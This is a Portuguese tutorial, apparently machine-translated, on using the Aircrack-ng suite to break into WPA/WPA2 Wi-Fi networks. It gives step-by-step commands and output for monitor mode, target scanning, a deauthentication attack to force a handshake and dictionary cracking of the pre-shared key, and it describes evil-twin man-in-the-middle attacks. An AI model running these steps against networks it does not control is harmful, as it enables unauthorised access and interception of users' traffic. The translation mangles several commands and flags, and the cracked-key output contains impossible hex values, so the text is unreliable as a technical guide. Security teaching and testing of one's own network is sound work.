Como usar o Aircrack-ng

Como usar o Aircrack-ng
Na maioria das vezes, as pessoas nunca pensam na rede à qual estão conectadas. Eles nunca pensam em quão seguro é essa rede e quanto eles arremessam seus dados confidenciais diariamente. Você pode executar verificações de vulnerabilidade em suas redes Wi -Fi usando uma ferramenta muito poderosa chamada Aircrack-ng e Wireshark. Wireshark é usado para monitorar a atividade da rede. Aircrack-ng é mais como uma ferramenta agressiva que permite invadir e dar acesso a conexões sem fio. Pensar como intruso sempre foi a maneira mais segura de se proteger contra um hack. Você pode entender as ações exatas que um intruso tomará para obter acesso ao seu sistema aprendendo sobre o Aircrack. Você pode realizar verificações de conformidade em seu próprio sistema para garantir que ele não seja inseguro.

Aircrack-ng é um conjunto completo de software projetado para testar a segurança da rede Wi -Fi. Não é apenas uma única ferramenta, mas uma coleção de ferramentas, cada uma das quais executa um propósito específico. Diferentes áreas de segurança wifi podem ser trabalhadas, como monitorar o ponto de acesso, testar, atacar a rede, quebrar a rede WiFi e testá -la. O principal objetivo do AirCrack é interceptar os pacotes e decifrar os hashes para quebrar as senhas. Ele suporta quase todas as novas interfaces sem fio. Aircrack-ng é uma versão aprimorada de um pacote de ferramentas desatualizado aircrack, ng refere -se ao Nova geração. Algumas das ferramentas incríveis que trabalham juntas para fazer uma tarefa maior.

Airmon-NG:

Airmon-NG está incluído no kit Aircrack-NG que coloca a placa de interface de rede no modo de monitor. Os cartões de rede geralmente aceitam apenas pacotes direcionados para eles, conforme definido pelo endereço MAC da NIC, mas com airmon-ng, todos os pacotes sem fio, sejam eles direcionados para eles ou não, serão aceitos também. Você deve ser capaz de pegar esses pacotes sem vincular ou autenticar com o ponto de acesso. É usado para verificar o status de um ponto de acesso colocando a interface de rede no modo de monitor. Em primeiro lugar, é preciso configurar as placas sem fio para ativar o modo de monitor e depois matar todos os processos em segundo plano, se você acha que qualquer processo está interferindo nele. Depois de encerrar os processos, o modo de monitor pode ser ativado na interface sem fio executando o comando abaixo:

ubuntu@ubuntu: ~ $ sudo airmon-ng start wlan0 #

Você também pode desativar o modo de monitor, interrompendo o airmon-ng a qualquer momento usando o comando abaixo:

ubuntu@ubuntu: ~ $ sudo airmon-ng Stop wlan0 #

Airodump-NG:

Airodump-ng é usado para listar todas as redes que nos cercam e para ver informações valiosas sobre elas. A funcionalidade básica do Airodump-NG é cheirar pacotes, por isso é essencialmente programado para pegar todos os pacotes ao nosso redor enquanto é colocado no modo de monitor. Vamos executá -lo contra todas as conexões ao nosso redor e reunir dados como o número de clientes conectados à rede, seus endereços MAC correspondentes, estilo de criptografia e nomes de canais e depois começar a direcionar nossa rede de destino.

Digitando o comando Airodump-NG e dando-lhe o nome da interface de rede como parâmetro, podemos ativar esta ferramenta. Ele listará todos os pontos de acesso, a quantidade de pacotes de dados, métodos de criptografia e autenticação usados ​​e o nome da rede (Essid). Do ponto de vista de hackers, os endereços MAC são os campos mais importantes.

ubuntu@ubuntu: ~ $ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack é usado para rachaduras de senha. Depois de capturar todos os pacotes usando airodump, podemos quebrar a chave pelo Aircrack. Racha essas chaves usando dois métodos PTW e FMS. A abordagem PTW é feita em duas fases. No começo, apenas os pacotes ARP estão sendo usados ​​e somente então, se a chave não estiver quebrada após a pesquisa, ele usa todos os outros pacotes capturados. Um ponto positivo da abordagem PTW é que nem todos os pacotes são usados ​​para a rachadura. Na segunda abordagem, eu.e., FMS, usamos os modelos estatísticos e os algos de força bruta para quebrar a chave. Um método de dicionário também pode ser usado.

Aireplay-ng:

O AirPlay-NG apresenta pacotes em uma rede sem fio para criar ou acelerar o tráfego. Pacotes de duas fontes diferentes podem ser capturados pelo Aireplay-NG. A primeira é a rede ao vivo, e a segunda são os pacotes do arquivo PCAP já existente. O AirPlay-NG é útil durante um ataque de desativação que tem como alvo um ponto de acesso sem fio e um usuário. Além disso, você pode realizar alguns ataques como ataque de café com café com o AirPlay-NG, uma ferramenta que permite obter uma chave do sistema do cliente. Você pode conseguir isso pegando um pacote ARP e depois manipulando -o e enviando -o de volta ao sistema. O cliente criará um pacote que pode ser capturado pelo Airodump e Aircrack quebra a chave desse pacote modificado. Algumas outras opções de ataque do AirPlay-NG incluem Chopchop, Fragment ArePreplay, etc.

Airbase-ng:

Airbase-NG é usada para transformar o computador de um intruso em um ponto de conexão comprometido para que outros. Usando o Airbase-NG, você pode afirmar ser um ponto de acesso legal e realizar ataques de homem no meio-médio a computadores que estão anexados à sua rede. Esses tipos de ataques são chamados de ataques gêmeos do mal. É impossível para os usuários básicos discernir entre um ponto de acesso legal e um ponto de acesso falso. Então, a ameaça gêmea do mal está entre as ameaças sem fio mais ameaçadoras que enfrentamos hoje.

Airolib-NG:

Airolib acelera o processo de hackers armazenando e gerenciando as listas de senha e o ponto de acesso. O sistema de gerenciamento de banco de dados usado por este programa é o sqlite3, que está disponível principalmente em todas as plataformas. A quebra de senha inclui o cálculo da chave mestre em pares através da qual a chave transitória privada (PTK) é extraída. Usando o PTK, você pode determinar o Código de Identificação da Mensagem do Quadro (MIC) para um determinado pacote e, teoricamente.

Para ver as listas de senha e as redes de acesso armazenadas no banco de dados, digite o seguinte comando:

ubuntu@ubuntu: ~ $ sudo airolib -ng testdatabase -stats

Aqui, o testDatabase é o banco de dados que você deseja acessar ou criar, e -stats é a operação que você deseja executar nele. Você pode fazer várias operações nos campos de banco de dados, como dar prioridade máxima a algum SSID ou algo assim. Para usar airolib-ng com aircrack-ng, insira o seguinte comando:

ubuntu@ubuntu: ~ $ sudo aircrack -ng -r testDatabase wpa2.Eapol.boné

Aqui estamos usando o PMK já calculado é armazenado no TestDatabase Para acelerar o processo de quebra de senha.

Rachando wpa/wpa2 usando aircrack-ng:

Vejamos um pequeno exemplo do que o Aircrack-NG pode fazer com a ajuda de algumas de suas ferramentas incríveis. Vamos quebrar a chave pré-compartilhada da rede WPA/WPA2 usando um método de dicionário.

A primeira coisa que precisamos fazer é listar as interfaces de rede que suportam o modo de monitor. Isso pode ser feito usando o seguinte comando:

ubuntu@ubuntu: ~ $ sudo airmon-ng
Chipset de driver de interface phy
PHY0 WLX0 RTL8XXXU REALTEK SEMICONDUCTOR CORP.

Podemos ver uma interface; Agora, temos que colocar a interface de rede que encontramos (WLX0) no modo Monitor usando o seguinte comando:

ubuntu@ubuntu: ~ $ sudo airmon-ng start wlx0

Ele permitiu o modo de monitor na interface chamada wlx0mon.

Agora devemos começar a ouvir transmissões por roteadores próximos por meio de nossa interface de rede que colocamos no modo monitor.

ubuntu@ubuntu: ~ $ sudo airodump-ng wlx0mon
CH 5] [Declantado: 30 S] [2020-12-02 00:17
Bssid pwr beacons #data, #/s ch mb cipher auth essid
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54E WPA2 CCMP PSK Crackit
C4: E9: 84: 76: 10: Be -63 77 0 0 6 54E. WPA2 CCMP PSK HackMe
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54E WPA2 CCMP PSK NET07
74: da: 88: fa: 38: 02 -68 28 2 0 11 54e wpa2 ccmp psk tp -link_3802
Estação BSSID PWR Taxa Lost Frames Sonda
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8b -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1E- 6E 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0E- 1 1002 13

Nossa rede de destino é Quebrar Nesse caso, que está sendo executado atualmente no canal 1.

Aqui para quebrar a senha da rede de destino, precisamos capturar um aperto de mão de 4 vias, o que acontece quando um dispositivo tenta se conectar a uma rede. Podemos capturá -lo usando o seguinte comando:

ubuntu@ubuntu: ~ $ sudo airodump -ng -c 1 - -bssid e4: 6f: 13: 04: CE: 31 -w /home wlx0

-c : Canal

-BSSID: Bssid da rede de destino

-c : O nome do diretório onde o arquivo PCAP será colocado

Agora temos que esperar que um dispositivo se conecte à rede, mas há uma maneira melhor de capturar um aperto de mão. Podemos desautenticar os dispositivos para o AP usando um ataque de desacenticação usando o seguinte comando:

ubuntu@ubuntu: ~ $ sudo aireplay -ng -0 -a e4: 6f: 13: 04: CE: 31

a: Bssid da rede de destino

-0: Ataque de desaciticação

Desconectamos todos os dispositivos e agora temos que esperar que um dispositivo se conecte à rede.

CH 1] [decorrido: 30 s] [2020-12-02 00:02] [WPA Handshake: E4: 6f: 13: 04: CE: 31
Bssid pwr rxq beacons #data, #/s ch mb cip cipher auth e
E4: 6F: 13: 04: CE: 31 -47 1 228 807 36 1 54E WPA2 CCMP PSK P
Estação BSSID PWR Taxa Lost Frames Sonda
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6f: 13: 04: CE: 31 5c: 3a: 45: d7: ea: 8b -29 0e- 1e 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7e -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0E- 6E 263 708 Crackit
E4: 6F: 13: 04: CE: 31 D4: 6a: 6a: 99: ed: e3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1E 0 1

Recebemos um sucesso e, olhando para o canto superior direito ao lado do tempo, podemos ver um aperto de mão foi capturado. Agora olhe na pasta especificada ( /lar no nosso caso) para um “.PCAP" arquivo.

Para quebrar a chave WPA, podemos usar o seguinte comando:

ubuntu@ubuntu: ~ $ sudo aircrack -ng -a2 -w rockyou.TXT -B E4: 6F: 13: 04: CE: 31 Handshake.boné
B: BSSID da rede de destino
-A2: modo WPA2
Rockyou.txt: o arquivo de dicionário usado
Aperto de mão.Cap: o arquivo que contém aperto de mão capturado
Aircrack-ng 1.2 beta3
[00:01:49] 10566 Chaves testadas (1017.96 K/S)
Chave encontrada! [ você me pegou ]
Chave mestre: 8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0c 06 08 ed bc 6b h7 j8 k1 a0 89 6b 7b b f7 6f 50 c
Chave transitória: 4d C4 5r 6t 76 99 6g 7h 8d EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 bd k1 a0 89 6b 0c 08 0c 06 08 ed bc 6b h7 j8 k1 a0 89
8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
Mac: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

A chave da nossa rede de destino foi quebrada com sucesso.

Conclusão:

Redes sem fio estão por toda parte, usadas por todas e em todas as empresas, de trabalhadores que usam smartphones a dispositivos de controle industrial. Segundo a pesquisa, quase mais de 50 % do tráfego da Internet será sobre o WiFi em 2021. Redes sem fio têm muitas vantagens, comunicação fora das portas, acesso rápido à Internet em locais onde é quase impossível colocar fios, pode expandir a rede sem instalar cabos para qualquer outro usuário e pode facilmente conectar seus dispositivos móveis aos seus escritórios domésticos enquanto você não 't lá.

Apesar dessas vantagens, há um grande ponto de interrogação sobre sua privacidade e segurança. Como essas redes; Dentro da faixa de transmissão de roteadores estão abertos a todos, eles podem ser facilmente atacados e seus dados podem ser facilmente comprometidos. Por exemplo, se você estiver conectado a algum wifi público, qualquer pessoa conectada a essa rede pode verificar facilmente o tráfego da sua rede usando alguma inteligência e com a ajuda de ferramentas impressionantes disponíveis e até despejar.